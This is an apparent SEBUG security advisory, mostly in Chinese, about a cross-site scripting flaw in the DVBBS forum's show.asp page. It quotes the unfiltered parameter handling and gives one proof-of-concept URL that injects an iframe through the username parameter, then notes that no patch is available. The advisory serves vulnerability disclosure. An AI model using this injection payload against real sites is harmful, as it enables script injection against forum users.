DVBBS 8.0.0-8.2.0
动网论坛(DVBBS)Show.asp页面过滤不严导致跨站漏洞
SEBUG-ID:11413
SEBUG-Appdir:动网(DVBBS)
Published:2009-05-25
Vulnerable:
Discription:
文件show.asp中:
filetype=Request("filetype") //第75行
username=Request("username")
……
TempStr = Replace(TempStr,"{$username}",UserName) //第244行
程序对于输出变量filetype和username过滤导致xss漏洞的产生。<*References
Bug.Center.Team*>
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
http://www.target.com/show.asp?filetype=xxx&username=nnn<iframe%20src=http://www.baidu.com></iframe>
SEBUG Solution:
厂商补丁 DVBBS ---------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.dvbbs.net
// sebug.net [2009-05-25]